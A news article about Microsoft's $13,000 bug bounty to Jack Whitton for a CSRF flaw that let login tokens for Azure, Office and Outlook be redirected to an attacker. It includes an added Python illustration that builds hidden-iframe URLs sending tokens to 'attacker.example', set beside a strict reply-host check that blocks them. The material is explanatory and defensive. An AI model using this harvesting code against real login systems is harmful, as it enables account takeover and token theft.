Microsoft awarded United Kingdom-based security researcher Jack Whitton a $13,000 bug bounty for unearthing a critical authentication flaw impacting Azure, Office and Outlook accounts.
Whitton details the attack in a blog post published on Sunday, April 3.
He says that Microsoft's authentication system was susceptible to cross-site request forgery (CSRF) attacks, allowing an attacker to harvest a victim's login tokens, impersonate that user, and compromise their accounts and data in the process.
"Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large," says Whitton.
The newly uncovered loophole resembles a CSRF issue in Live.com found by Wesley Wineberg, a senior security researcher at Synack.
The difference between the two is where they sit: Wineberg's issue affected the CSRF protection of Microsoft's OAuth flow, whereas Whitton's flaw affected Microsoft's main authentication system.
Microsoft runs a number of online services, such as Azure and Outlook, that share one login system. When a user signs in to one of them, their credentials are submitted to Microsoft's login endpoint; on success, the login token is sent in a POST request to the address given by the 'wreply' value in the login URL, where the receiving service consumes the token to log the user in.
Whitton found that this login URL was open to CSRF: an attacker can craft a malicious login URL whose token delivery points at a server they control. When a user who is already authenticated visits that URL, the login token is POSTed to the attacker's server instead of the legitimate service.
The researcher underscores that each token is valid only for the service that issued it.
"[A]n Outlook token cannot be used for Azure, for example," he explains. "But it'd be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way."
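The following added example models the flow described above and the harvesting trick Whitton mentions. It is an illustration written for this article, not Microsoft's code and not Whitton's actual bypass: the endpoint `login.example`, the attacker host `attacker.example`, the allowlist of reply hosts and the substring-based "weak" check are all constructed assumptions. It puts a naive return-URL check beside a strict allowlist check, issues per-service tokens, and simulates a signed-in victim loading a page of hidden iframes, one per service.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed allowlist: hostnames allowed to receive a login token, and the
# service each one belongs to. Not Microsoft's real list.
ALLOWED_REPLY_HOSTS = {
    "outlook.live.com": "outlook",
    "portal.azure.com": "azure",
    "www.office.com": "office",
}
LOGIN_URL = "https://login.example/login.srf"   # hypothetical login endpoint
ATTACKER_HOST = "attacker.example"              # hypothetical attacker server
_SERVER_KEY = secrets.token_bytes(32)           # per-process token signing key


def weak_wreply_check(wreply: str) -> bool:
    """Hypothetical weak check: accept any wreply that merely contains an
    allowed hostname. 'https://attacker.example/?outlook.live.com' passes."""
    return any(host in wreply for host in ALLOWED_REPLY_HOSTS)


def strict_wreply_check(wreply: str) -> bool:
    """Parse the URL and compare the exact hostname against the allowlist,
    rejecting userinfo, non-https schemes and explicit ports."""
    try:
        parts = urlsplit(wreply)
        port = parts.port            # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme != "https" or parts.username is not None or port is not None:
        return False
    return parts.hostname in ALLOWED_REPLY_HOSTS


def issue_token(user: str, service: str) -> str:
    """A login token bound to the service it was issued for, as Whitton notes
    (an Outlook token cannot be used for Azure)."""
    body = f"{user}|{service}"
    mac = hmac.new(_SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{mac}"


def consume_token(token: str, service: str):
    """Return the user the token logs in for `service`, or None if the token
    was issued for another service or has been tampered with."""
    try:
        user, svc, mac = token.split("|")
    except ValueError:
        return None
    expected = hmac.new(_SERVER_KEY, f"{user}|{svc}".encode(), hashlib.sha256).hexdigest()
    if svc != service or not hmac.compare_digest(mac, expected):
        return None
    return user


def login_redirect(user: str, login_url: str, check):
    """Model the post-authentication step: an already-signed-in user hits a
    login URL and the server answers with an auto-submitting POST form.
    Returns (destination hostname, token), or None if wreply is rejected."""
    q = parse_qs(urlsplit(login_url).query)
    service, wreply = q["service"][0], q["wreply"][0]
    if not check(wreply):
        return None
    return urlsplit(wreply).hostname, issue_token(user, service)


def harvest_urls(attacker_host: str = ATTACKER_HOST):
    """One login URL per service, each with wreply pointing at the attacker
    but padded with an allowed hostname so a substring check passes."""
    urls = []
    for host, service in ALLOWED_REPLY_HOSTS.items():
        wreply = f"https://{attacker_host}/collect?{host}"
        urls.append(f"{LOGIN_URL}?{urlencode({'service': service, 'wreply': wreply})}")
    return urls


def harvest_page(attacker_host: str = ATTACKER_HOST) -> str:
    """The hidden-iframe page Whitton describes: one frame per service."""
    frames = "\n".join(f'<iframe src="{u}" style="display:none"></iframe>'
                       for u in harvest_urls(attacker_host))
    return f"<html><body>\n{frames}\n</body></html>"


def harvested_tokens(user: str, check, attacker_host: str = ATTACKER_HOST):
    """Simulate a signed-in victim loading the page: tokens that land on the
    attacker's host, keyed by the service each one logs in to."""
    got = {}
    for url in harvest_urls(attacker_host):
        result = login_redirect(user, url, check)
        if result and result[0] == attacker_host:
            service = parse_qs(urlsplit(url).query)["service"][0]
            got[service] = result[1]
    return got
```

With the weak check, `harvested_tokens("alice", weak_wreply_check)` yields one token per service, each consumable only by its own service; with `strict_wreply_check` the attacker gets nothing, because the hostname is compared exactly after parsing rather than searched for as a substring.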
Microsoft patched the flaw within 48 hours: Whitton reported it on Jan. 24, Microsoft acknowledged it by the end of that day, and by Jan. 26 the fix was fully deployed.
The awarded money is part of the company's bug bounty program.